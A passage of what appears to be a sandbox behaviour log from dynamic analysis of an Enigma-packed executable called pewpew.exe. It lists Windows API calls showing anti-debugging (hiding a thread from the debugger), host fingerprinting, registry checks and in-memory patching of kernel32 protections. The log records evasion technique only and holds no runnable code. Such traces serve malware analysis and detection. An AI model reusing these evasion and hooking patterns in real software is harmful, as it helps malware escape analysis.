(TargetFrame=0x6ef804, TargetIp=0xd3944, ExceptionRecord=0x6ef350, ReturnValue=0x0) [0067.555] RtlUnwind (TargetFrame=0x6ef804, TargetIp=0xd3944, ExceptionRecord=0x6ef350, ReturnValue=0x0) [0067.555] RtlUnwind (TargetFrame=0x6ef804, TargetIp=0xd3944, ExceptionRecord=0x6ef350, ReturnValue=0x0) [0067.555] LoadStringA (in: hInstance=0xd0000, uID=0xffdf, lpBuffer=0x6eee2c, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0067.556] RtlUnwind (TargetFrame=0x6ef804, TargetIp=0xd3944, ExceptionRecord=0x6ef350, ReturnValue=0x0) [0067.556] LoadStringA (in: hInstance=0xd0000, uID=0xffdf, lpBuffer=0x6eee2c, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0067.556] RtlUnwind (TargetFrame=0x6ef804, TargetIp=0xd3944, ExceptionRecord=0x6ef350, ReturnValue=0x0) [0067.556] GetModuleFileNameW (in: hModule=0xc0000, lpFilename=0xb0b8fc, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe")) returned 0x30 [0067.556] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", nBufferLength=0x104, lpBuffer=0x6ef378, lpFilePart=0x6ef374 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", lpFilePart=0x6ef374*="pewpew.exe") returned 0x30 [0067.557] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", lpFindFileData=0x6ef5d0 | out: lpFindFileData=0x6ef5d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd056e600, ftCreationTime.dwHighDateTime=0x1d68bac, ftLastAccessTime.dwLowDateTime=0xd0ef7c80, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xac91a100, ftLastWriteTime.dwHighDateTime=0x1d68ba8, nFileSizeHigh=0x0, nFileSizeLow=0x104a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="pewpew.exe", cAlternateFileName="")) returned 0xb10ae8 [0067.557] FileTimeToLocalFileTime (in: lpFileTime=0x6ef5e4, lpLocalFileTime=0x6ef56c | out: lpLocalFileTime=0x6ef56c) returned 1 [0067.557] FileTimeToDosDateTime (in: lpFileTime=0x6ef56c, lpFatDate=0x6ef5b2, lpFatTime=0x6ef5b0 | out: lpFatDate=0x6ef5b2, lpFatTime=0x6ef5b0) returned 1 [0067.557] SysReAllocStringLen (in: pbstr=0x6ef5a8*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", len=0x26 | out: pbstr=0x6ef5a8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 1 [0067.557] SysReAllocStringLen (in: pbstr=0x6ef5a0*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", len=0x30 | out: pbstr=0x6ef5a0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe") returned 1 [0067.557] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", cchLength=0x30 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe") returned 0x30 [0067.557] SysReAllocStringLen (in: pbstr=0x6ef88c*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", psz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe", len=0x30 | out: pbstr=0x6ef88c*="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe") returned 1 [0067.557] SysReAllocStringLen (in: pbstr=0x20c57c*=0x0, psz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe", len=0x30 | out: pbstr=0x20c57c*="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe") returned 1 [0067.558] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0067.558] GetProcAddress (hModule=0x77c40000, lpProcName="NtSetInformationThread") returned 0x77c5f99c [0067.558] GetCurrentThread () returned 0xfffffffe [0067.558] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0067.670] VirtualQuery (in: lpAddress=0xc2000, lpBuffer=0x6ef7f8, dwLength=0x1c | out: lpBuffer=0x6ef7f8*(BaseAddress=0xc2000, AllocationBase=0xc0000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0067.670] VirtualQuery (in: lpAddress=0xca000, lpBuffer=0x6ef7f8, dwLength=0x1c | out: lpBuffer=0x6ef7f8*(BaseAddress=0xca000, AllocationBase=0xc0000, AllocationProtect=0x80, RegionSize=0x6000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0067.670] VirtualQuery (in: lpAddress=0xcc000, lpBuffer=0x6ef7f8, dwLength=0x1c | out: lpBuffer=0x6ef7f8*(BaseAddress=0xcc000, AllocationBase=0xc0000, AllocationProtect=0x80, RegionSize=0x4000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0067.670] VirtualQuery (in: lpAddress=0xc0000, lpBuffer=0x6ef7f8, dwLength=0x1c | out: lpBuffer=0x6ef7f8*(BaseAddress=0xc0000, AllocationBase=0xc0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0067.670] GetUserNameA (in: lpBuffer=0x20c33c, pcbBuffer=0x20c338 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x20c338) returned 1 [0067.784] GetComputerNameA (in: lpBuffer=0x20c450, nSize=0x20c44c | out: lpBuffer="XDUWTFONO", nSize=0x20c44c) returned 1 [0067.785] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c00a8, cbMultiByte=43, lpWideCharStr=0x6ee810, cchWideChar=2047 | out: lpWideCharStr="Software\\Enigma Protector\\%.8x%.8x-%.8x%.8x矉°㮈急⤖ឹ㏐荪琩ꪔЉ") returned 43 [0067.785] SysReAllocStringLen (in: pbstr=0x2291d94*=0x0, psz="Software\\Enigma Protector\\29AEB4A0365755F6-B862CAE984EA4D0E", len=0x3b | out: pbstr=0x2291d94*="Software\\Enigma Protector\\29AEB4A0365755F6-B862CAE984EA4D0E") returned 1 [0067.785] VirtualQuery (in: lpAddress=0xc2000, lpBuffer=0x6ef7f8, dwLength=0x1c | out: lpBuffer=0x6ef7f8*(BaseAddress=0xc2000, AllocationBase=0xc0000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0067.785] VirtualQuery (in: lpAddress=0xca000, lpBuffer=0x6ef7f8, dwLength=0x1c | out: lpBuffer=0x6ef7f8*(BaseAddress=0xca000, AllocationBase=0xc0000, AllocationProtect=0x80, RegionSize=0x6000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0067.785] VirtualQuery (in: lpAddress=0xcc000, lpBuffer=0x6ef7f8, dwLength=0x1c | out: lpBuffer=0x6ef7f8*(BaseAddress=0xcc000, AllocationBase=0xc0000, AllocationProtect=0x80, RegionSize=0x4000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0067.785] VirtualQuery (in: lpAddress=0xc0000, lpBuffer=0x6ef7f8, dwLength=0x1c | out: lpBuffer=0x6ef7f8*(BaseAddress=0xc0000, AllocationBase=0xc0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0067.844] GetWindowsDirectoryA (in: lpBuffer=0x6ef6cb, uSize=0x105 | out: lpBuffer="C:\\Windows") returned 0xa [0067.844] CreateFileA (lpFileName="\\\\.\\C:" (normalized: "c:"), dwDesiredAccess=0x0, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x108 [0067.984] DeviceIoControl (in: hDevice=0x108, dwIoControlCode=0x2d1400, lpInBuffer=0x6ef7d0*, nInBufferSize=0xc, lpOutBuffer=0x22c0114, nOutBufferSize=0x2710, lpBytesReturned=0x6ef7e0, lpOverlapped=0x0 | out: lpInBuffer=0x6ef7d0*, lpOutBuffer=0x22c0114*, lpBytesReturned=0x6ef7e0*=0xa7, lpOverlapped=0x0) returned 1 [0067.990] CloseHandle (hObject=0x108) returned 1 [0068.064] LoadStringA (in: hInstance=0xd0000, uID=0xffdf, lpBuffer=0x6eee2c, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0068.069] RtlUnwind (TargetFrame=0x6ef804, TargetIp=0xd3944, ExceptionRecord=0x6ef350, ReturnValue=0x0) [0068.070] RtlUnwind (TargetFrame=0x6ef804, TargetIp=0xd3944, ExceptionRecord=0x6ef350, ReturnValue=0x0) [0068.073] LoadStringA (in: hInstance=0xd0000, uID=0xffdf, lpBuffer=0x6eee2c, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0068.073] RtlUnwind (TargetFrame=0x6ef804, TargetIp=0xd3944, ExceptionRecord=0x6ef350, ReturnValue=0x0) [0068.073] LoadStringA (in: hInstance=0xd0000, uID=0xffdf, lpBuffer=0x6eee2c, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0068.074] RtlUnwind (TargetFrame=0x6ef804, TargetIp=0xd3944, ExceptionRecord=0x6ef350, ReturnValue=0x0) [0068.074] GetCurrentProcessId () returned 0xbe0 [0068.074] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0068.074] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0068.074] GetProcAddress (hModule=0x76d30000, lpProcName="Heap32ListFirst") returned 0x76dc5621 [0068.074] GetProcAddress (hModule=0x76d30000, lpProcName="Heap32ListNext") returned 0x76dc56cb [0068.074] GetProcAddress (hModule=0x76d30000, lpProcName="Heap32First") returned 0x76dc5763 [0068.075] GetProcAddress (hModule=0x76d30000, lpProcName="Heap32Next") returned 0x76dc594e [0068.075] GetProcAddress (hModule=0x76d30000, lpProcName="Toolhelp32ReadProcessMemory") returned 0x76dc5b53 [0068.075] GetProcAddress (hModule=0x76d30000, lpProcName="Process32First") returned 0x76d68ae7 [0068.075] GetProcAddress (hModule=0x76d30000, lpProcName="Process32Next") returned 0x76d688a4 [0068.075] GetProcAddress (hModule=0x76d30000, lpProcName="Process32FirstW") returned 0x76d68baf [0068.075] GetProcAddress (hModule=0x76d30000, lpProcName="Process32NextW") returned 0x76d6896c [0068.075] GetProcAddress (hModule=0x76d30000, lpProcName="Thread32First") returned 0x76dc5b93 [0068.075] GetProcAddress (hModule=0x76d30000, lpProcName="Thread32Next") returned 0x76dc5c3f [0068.075] GetProcAddress (hModule=0x76d30000, lpProcName="Module32First") returned 0x76dc5cd9 [0068.075] GetProcAddress (hModule=0x76d30000, lpProcName="Module32Next") returned 0x76dc5dc2 [0068.076] GetProcAddress (hModule=0x76d30000, lpProcName="Module32FirstW") returned 0x76d679f9 [0068.076] GetProcAddress (hModule=0x76d30000, lpProcName="Module32NextW") returned 0x76d67d96 [0068.076] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0xbe0) returned 0x10c [0068.167] Module32First (hSnapshot=0x10c, lpme=0x6ef5f0) returned 1 [0068.168] Module32Next (hSnapshot=0x10c, lpme=0x6ef5f0) returned 1 [0068.168] Module32Next (hSnapshot=0x10c, lpme=0x6ef5f0) returned 1 [0068.169] Module32Next (hSnapshot=0x10c, lpme=0x6ef5f0) returned 1 [0068.170] Module32Next (hSnapshot=0x10c, lpme=0x6ef5f0) returned 1 [0068.170] Module32Next (hSnapshot=0x10c, lpme=0x6ef5f0) returned 1 [0068.171] Module32Next (hSnapshot=0x10c, lpme=0x6ef5f0) returned 1 [0068.172] Module32Next (hSnapshot=0x10c, lpme=0x6ef5f0) returned 1 [0068.172] Module32Next (hSnapshot=0x10c, lpme=0x6ef5f0) returned 1 [0068.173] Module32Next (hSnapshot=0x10c, lpme=0x6ef5f0) returned 1 [0068.174] Module32Next (hSnapshot=0x10c, lpme=0x6ef5f0) returned 1 [0068.175] Module32Next (hSnapshot=0x10c, lpme=0x6ef5f0) returned 1 [0068.175] Module32Next (hSnapshot=0x10c, lpme=0x6ef5f0) returned 1 [0068.176] Module32Next (hSnapshot=0x10c, lpme=0x6ef5f0) returned 1 [0068.177] Module32Next (hSnapshot=0x10c, lpme=0x6ef5f0) returned 1 [0068.177] Module32Next (hSnapshot=0x10c, lpme=0x6ef5f0) returned 1 [0068.178] Module32Next (hSnapshot=0x10c, lpme=0x6ef5f0) returned 1 [0068.179] Module32Next (hSnapshot=0x10c, lpme=0x6ef5f0) returned 1 [0068.179] Module32Next (hSnapshot=0x10c, lpme=0x6ef5f0) returned 1 [0068.180] Module32Next (hSnapshot=0x10c, lpme=0x6ef5f0) returned 1 [0068.181] Module32Next (hSnapshot=0x10c, lpme=0x6ef5f0) returned 1 [0068.181] Module32Next (hSnapshot=0x10c, lpme=0x6ef5f0) returned 1 [0068.182] Module32Next (hSnapshot=0x10c, lpme=0x6ef5f0) returned 1 [0068.183] Module32Next (hSnapshot=0x10c, lpme=0x6ef5f0) returned 1 [0068.183] Module32Next (hSnapshot=0x10c, lpme=0x6ef5f0) returned 1 [0068.184] Module32Next (hSnapshot=0x10c, lpme=0x6ef5f0) returned 1 [0068.185] Module32Next (hSnapshot=0x10c, lpme=0x6ef5f0) returned 0 [0068.185] CloseHandle (hObject=0x10c) returned 1 [0068.234] RtlUnwind (TargetFrame=0x6ef804, TargetIp=0xd3944, ExceptionRecord=0x6ef350, ReturnValue=0x0) [0068.237] LoadStringA (in: hInstance=0xd0000, uID=0xffdf, lpBuffer=0x6eee2c, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0068.241] RtlUnwind (TargetFrame=0x6ef804, TargetIp=0xd3944, ExceptionRecord=0x6ef350, ReturnValue=0x0) [0068.249] RtlUnwind (TargetFrame=0x6ef804, TargetIp=0xd3944, ExceptionRecord=0x6ef350, ReturnValue=0x0) [0068.249] RtlUnwind (TargetFrame=0x6ef804, TargetIp=0xd3944, ExceptionRecord=0x6ef350, ReturnValue=0x0) [0068.252] RtlUnwind (TargetFrame=0x6ef804, TargetIp=0xd3944, ExceptionRecord=0x6ef350, ReturnValue=0x0) [0068.254] LoadStringA (in: hInstance=0xd0000, uID=0xffdf, lpBuffer=0x6eee2c, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0068.254] RtlUnwind (TargetFrame=0x6ef804, TargetIp=0xd3944, ExceptionRecord=0x6ef350, ReturnValue=0x0) [0068.256] RtlUnwind (TargetFrame=0x6ef804, TargetIp=0xd3944, ExceptionRecord=0x6ef350, ReturnValue=0x0) [0068.256] VirtualQuery (in: lpAddress=0xc2000, lpBuffer=0x6ef7f8, dwLength=0x1c | out: lpBuffer=0x6ef7f8*(BaseAddress=0xc2000, AllocationBase=0xc0000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0068.257] VirtualQuery (in: lpAddress=0xca000, lpBuffer=0x6ef7f8, dwLength=0x1c | out: lpBuffer=0x6ef7f8*(BaseAddress=0xca000, AllocationBase=0xc0000, AllocationProtect=0x80, RegionSize=0x6000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0068.257] VirtualQuery (in: lpAddress=0xcc000, lpBuffer=0x6ef7f8, dwLength=0x1c | out: lpBuffer=0x6ef7f8*(BaseAddress=0xcc000, AllocationBase=0xc0000, AllocationProtect=0x80, RegionSize=0x4000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0068.257] VirtualQuery (in: lpAddress=0xc0000, lpBuffer=0x6ef7f8, dwLength=0x1c | out: lpBuffer=0x6ef7f8*(BaseAddress=0xc0000, AllocationBase=0xc0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0068.294] VirtualQuery (in: lpAddress=0xc2000, lpBuffer=0x6ef7f8, dwLength=0x1c | out: lpBuffer=0x6ef7f8*(BaseAddress=0xc2000, AllocationBase=0xc0000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0068.294] VirtualQuery (in: lpAddress=0xca000, lpBuffer=0x6ef7f8, dwLength=0x1c | out: lpBuffer=0x6ef7f8*(BaseAddress=0xca000, AllocationBase=0xc0000, AllocationProtect=0x80, RegionSize=0x6000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0068.294] VirtualQuery (in: lpAddress=0xcc000, lpBuffer=0x6ef7f8, dwLength=0x1c | out: lpBuffer=0x6ef7f8*(BaseAddress=0xcc000, AllocationBase=0xc0000, AllocationProtect=0x80, RegionSize=0x4000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0068.295] VirtualQuery (in: lpAddress=0xc0000, lpBuffer=0x6ef7f8, dwLength=0x1c | out: lpBuffer=0x6ef7f8*(BaseAddress=0xc0000, AllocationBase=0xc0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0068.368] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="SOFTWARE\\EnigmaDevelopers", cchWideChar=25, lpMultiByteStr=0x6ee750, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SOFTWARE\\EnigmaDevelopersçn", lpUsedDefaultChar=0x0) returned 25 [0068.368] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="SOFTWARE\\EnigmaDevelopers", ulOptions=0x0, samDesired=0x20019, phkResult=0x6ef754 | out: phkResult=0x6ef754*=0x0) returned 0x2 [0068.413] GetLocalTime (in: lpSystemTime=0x6ef774 | out: lpSystemTime=0x6ef774*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x2, wMilliseconds=0xa3)) [0068.413] GetLocalTime (in: lpSystemTime=0x6ef774 | out: lpSystemTime=0x6ef774*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x2, wMilliseconds=0xa3)) [0068.413] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c1bc8, cbMultiByte=8, lpWideCharStr=0x6ee780, cchWideChar=2047 | out: lpWideCharStr="80EB2F5C䕁㑂ぁ㘳㜵㔵㙆䈭㘸䌲䕁㠹䔴㑁い居㈰う䘱㔵䄳ㄱ䐲䕃〭䌰䐹㍂䌸㠱㕄䑆Ա±n䘨盤ּ±nV") returned 8 [0068.436] GetLocalTime (in: lpSystemTime=0x6ef6d0 | out: lpSystemTime=0x6ef6d0*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x2, wMilliseconds=0xb3)) [0068.436] GetLocalTime (in: lpSystemTime=0x6ef6d0 | out: lpSystemTime=0x6ef6d0*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x2, wMilliseconds=0xb3)) [0068.437] GetLocalTime (in: lpSystemTime=0x6ef6d0 | out: lpSystemTime=0x6ef6d0*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x2, wMilliseconds=0xb3)) [0068.437] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Enigma Protector\\29AEB4A0365755F6-B862CAE984EA4D0E\\02F01F553A112DCE-00C9DB38C18D5FD1", ulOptions=0x0, samDesired=0x20019, phkResult=0x6ef68c | out: phkResult=0x6ef68c*=0x0) returned 0x2 [0068.437] CreateFileW (lpFileName="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\80EB2F5C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\80eb2f5c"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.528] GetLocalTime (in: lpSystemTime=0x6ef6cc | out: lpSystemTime=0x6ef6cc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x2, wMilliseconds=0xf1)) [0068.528] GetLocalTime (in: lpSystemTime=0x6ef7fc | out: lpSystemTime=0x6ef7fc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x2, wMilliseconds=0xf1)) [0068.528] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1959a0, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x6ef820 | out: lpThreadId=0x6ef820*=0xb04) returned 0x10c [0068.560] LoadStringA (in: hInstance=0xd0000, uID=0xffdf, lpBuffer=0x6eee2c, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0068.561] RtlUnwind (TargetFrame=0x6ef804, TargetIp=0xd3944, ExceptionRecord=0x6ef350, ReturnValue=0x0) [0068.561] LoadStringA (in: hInstance=0xd0000, uID=0xffdf, lpBuffer=0x6eee2c, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0068.561] RtlUnwind (TargetFrame=0x6ef804, TargetIp=0xd3944, ExceptionRecord=0x6ef350, ReturnValue=0x0) [0068.562] RtlUnwind (TargetFrame=0x6ef804, TargetIp=0xd3944, ExceptionRecord=0x6ef350, ReturnValue=0x0) [0068.562] RtlUnwind (TargetFrame=0x6ef804, TargetIp=0xd3944, ExceptionRecord=0x6ef350, ReturnValue=0x0) [0068.562] RtlUnwind (TargetFrame=0x6ef804, TargetIp=0xd3944, ExceptionRecord=0x6ef350, ReturnValue=0x0) [0068.562] GetCurrentProcessId () returned 0xbe0 [0068.562] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0xbe0) returned 0x110 [0068.565] Module32First (hSnapshot=0x110, lpme=0x6ef5fc) returned 1 [0068.565] Module32Next (hSnapshot=0x110, lpme=0x6ef5fc) returned 1 [0068.566] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0068.566] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0068.566] Module32Next (hSnapshot=0x110, lpme=0x6ef5fc) returned 1 [0068.567] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0068.567] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0068.567] GetModuleFileNameA (in: hModule=0x76d30000, lpFilename=0x6ef4a4, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")) returned 0x20 [0068.568] GetCurrentProcess () returned 0xffffffff [0068.568] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76defb74, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76def000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.568] GetCurrentProcess () returned 0xffffffff [0068.568] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76defb74, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76def000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.568] GetCurrentProcess () returned 0xffffffff [0068.568] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76defc4c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76def000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.569] GetCurrentProcess () returned 0xffffffff [0068.569] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76defc4c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76def000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.569] GetCurrentProcess () returned 0xffffffff [0068.569] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76defc50, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76def000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.569] GetCurrentProcess () returned 0xffffffff [0068.569] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76defc50, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76def000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.569] GetCurrentProcess () returned 0xffffffff [0068.569] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76defc5c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76def000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.569] GetCurrentProcess () returned 0xffffffff [0068.570] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76defc5c, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76def000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.570] GetCurrentProcess () returned 0xffffffff [0068.570] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76defc68, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76def000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.570] GetCurrentProcess () returned 0xffffffff [0068.570] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76defc68, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76def000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.570] GetCurrentProcess () returned 0xffffffff [0068.570] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76deffb4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76def000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.570] GetCurrentProcess () returned 0xffffffff [0068.570] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76deffb4, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76def000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.570] GetCurrentProcess () returned 0xffffffff [0068.571] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76deffc0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x4, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76def000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x20) returned 0x0 [0068.571] GetCurrentProcess () returned 0xffffffff [0068.571] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76deffc0, NumberOfBytesToProtect=0x6ef5ac, NewAccessProtection=0x20, OldAccessProtection=0x6ef5e0 | out: BaseAddress=0x6ef5a8*=0x76def000, NumberOfBytesToProtect=0x6ef5ac, OldAccessProtection=0x6ef5e0*=0x4) returned 0x0 [0068.571] GetCurrentProcess () returned 0xffffffff [0068.571] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ef5a8*=0x76df0044, 